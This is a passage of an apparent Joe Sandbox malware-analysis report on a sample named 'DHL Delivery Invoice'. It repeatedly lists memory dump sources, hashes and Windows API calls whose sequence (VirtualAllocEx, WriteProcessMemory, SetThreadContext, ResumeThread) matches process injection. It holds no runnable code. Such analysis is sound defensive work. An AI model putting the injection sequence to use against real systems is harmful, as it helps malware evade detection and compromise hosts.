                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09830F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09830F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02AAB4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02AAB4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09716D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09830AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09830AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09716D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09830BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098304F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09830BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098304F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  APIs
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09718382,?,?,?,?,?), ref: 09718427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 098309F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 098309F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09834D45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09834D45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *w$*w
                                                                                                                                  • API String ID: 0-2919693051
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *w$*w
                                                                                                                                  • API String ID: 0-2919693051
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq
                                                                                                                                  • API String ID: 0-3255046985
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq
                                                                                                                                  • API String ID: 0-3255046985
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !yqo
                                                                                                                                  • API String ID: 0-2311287014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !yqo
                                                                                                                                  • API String ID: 0-2311287014
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:9.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:44
                                                                                                                                  Total number of Limit Nodes:6

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: a5627848dacfd73158babbc06542d8261599f99b3fdcd3fd34b03d929166d463
                                                                                                                                  • Instruction ID: 6f3cd6191dc1292a496d183dbcd5d97630476fddfba0b206289667dc19e5b31e
                                                                                                                                  • Opcode Fuzzy Hash: a5627848dacfd73158babbc06542d8261599f99b3fdcd3fd34b03d929166d463
                                                                                                                                  • Instruction Fuzzy Hash: 02321F31E1065ACFCB14EF65D99459DF7B2BFD9300F20C6A9D409A7264EB30A985CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: 695033b0381f0f305409ef1ca5d7a00f2281415f8b011e6d54144df9e76c3930
                                                                                                                                  • Instruction ID: 4af507b4f103aee29f3ac9e5b5b8527f0c956fc299cbe1b45eb552166d24f990
                                                                                                                                  • Opcode Fuzzy Hash: 695033b0381f0f305409ef1ca5d7a00f2281415f8b011e6d54144df9e76c3930
                                                                                                                                  • Instruction Fuzzy Hash: BF02AF30B002258FDB58DF65DA54AAEB7F2FF84700F148569E5159B3A9DB35EC82CB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3d07296bd45cf806177e8c542f8211582f346f68f56b052e5742e4cf31b0c3e4
                                                                                                                                  • Instruction ID: 9325890e37c202ec6cb4954aaddbedd013c3529b4c9a8468064d78017d1ef053
                                                                                                                                  • Opcode Fuzzy Hash: 3d07296bd45cf806177e8c542f8211582f346f68f56b052e5742e4cf31b0c3e4
                                                                                                                                  • Instruction Fuzzy Hash: F0925530A006248FDB64DF68C584A6DB7F2FF44714F5488A9E44AAB365DB35EE85CF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24ecff2c88f7199b73b1d5bf02ff8d9fd8ae6f8fb9b3df96e63f591f837c2b24
                                                                                                                                  • Instruction ID: 46a76e779407a14cd8dee4ee1c9f31d2da6dd5215f0fea58bbf471cd85bb6823
                                                                                                                                  • Opcode Fuzzy Hash: 24ecff2c88f7199b73b1d5bf02ff8d9fd8ae6f8fb9b3df96e63f591f837c2b24
                                                                                                                                  • Instruction Fuzzy Hash: F1629B34A002299FDB54DB68D594AADB7F2FB88750F248469E806EB394DB35ED41CF80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 047349fb9b8a89ad507f93d84394bfc20b001cdad49f19b8de3d47451382d35c
                                                                                                                                  • Instruction ID: fc220624aba6afc39edcd7620c91692cdce79bbf3756954e6f6f50de33d53ff9
                                                                                                                                  • Opcode Fuzzy Hash: 047349fb9b8a89ad507f93d84394bfc20b001cdad49f19b8de3d47451382d35c
                                                                                                                                  • Instruction Fuzzy Hash: A8328F34B102198FDF94DB68D990BAEB7B2FB88710F108569E506EB359DB35EC41CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8e970b9bdf1c6ba5535a80522a4316c29f34e30144a5989cca88a09c701b04dd
                                                                                                                                  • Instruction ID: 6f32f9afae6008bb2b90fc98666185b1853ea028544789eb70159e1250042c38
                                                                                                                                  • Opcode Fuzzy Hash: 8e970b9bdf1c6ba5535a80522a4316c29f34e30144a5989cca88a09c701b04dd
                                                                                                                                  • Instruction Fuzzy Hash: C512D175E002298FDF64DB64D9806AEB7B6FB84710F249429E906DB385EB34ED41CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 398d3398aac9d049896c98b487ae453b9bc6136408305db9a07870bede927db6
                                                                                                                                  • Instruction ID: af624707254926503062dbbf94354643e487f9a833eb9f7e4c040b9e941ffa5b
                                                                                                                                  • Opcode Fuzzy Hash: 398d3398aac9d049896c98b487ae453b9bc6136408305db9a07870bede927db6
                                                                                                                                  • Instruction Fuzzy Hash: 4D228030E102298FDFA4DB68C5807AEB7B6FB99710F248526E405EB395DA35DC81CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: 38b70714bac3a314243543412249808f5bb65c355fe59b06b6a9c324581cc768
                                                                                                                                  • Instruction ID: ae6d77c70641ca4cc63b3cfa864a9acf74bcb812002013550c0ea26095d96479
                                                                                                                                  • Opcode Fuzzy Hash: 38b70714bac3a314243543412249808f5bb65c355fe59b06b6a9c324581cc768
                                                                                                                                  • Instruction Fuzzy Hash: BAE17030E102198FCF65DBA9D5806AEB7F2FF85700F208929E419AB355DB75D846CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 65dec04a4bb59256ada003f2ba437eebaf140de1c24f489c4f26c96895afb8ce
                                                                                                                                  • Instruction ID: 74c45b9b824eb6145e373161f0a1c85b72980d1b7029964ab548c52cb9eeebc1
                                                                                                                                  • Opcode Fuzzy Hash: 65dec04a4bb59256ada003f2ba437eebaf140de1c24f489c4f26c96895afb8ce
                                                                                                                                  • Instruction Fuzzy Hash: 12028B30E1022A8FDFA4CF68D5806ADB7B2FB95710F24896AE405DB355DB34ED81CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: 78447271d2886241a389b22b554d01c2a1cbbaeacd1d22f72e4409da32f8d649
                                                                                                                                  • Instruction ID: 0a65a15af23b4e4366ed322453ab3bb512569c2fefad5edc7ae70cfb0d52775b
                                                                                                                                  • Opcode Fuzzy Hash: 78447271d2886241a389b22b554d01c2a1cbbaeacd1d22f72e4409da32f8d649
                                                                                                                                  • Instruction Fuzzy Hash: 1F917E70F0061A8FDB64DF65DA507AEB3B6BF84640F108469D809AB398EB75EC518F90

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2086306503
                                                                                                                                  • Opcode ID: fa1d6d848967aad97a44b6cbcfb3014ddfe1843825a786f9fab9227945c424e0
                                                                                                                                  • Instruction ID: 96f15e9ee8f3a9b307e4ef40cc82c6a0e6141eabda3248b1500348e1b49508c2
                                                                                                                                  • Opcode Fuzzy Hash: fa1d6d848967aad97a44b6cbcfb3014ddfe1843825a786f9fab9227945c424e0
                                                                                                                                  • Instruction Fuzzy Hash: 85625330A102198FCB55EF68D690A5EB7B2FF85700F20CA69D4059F369DB75ED86CB80

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
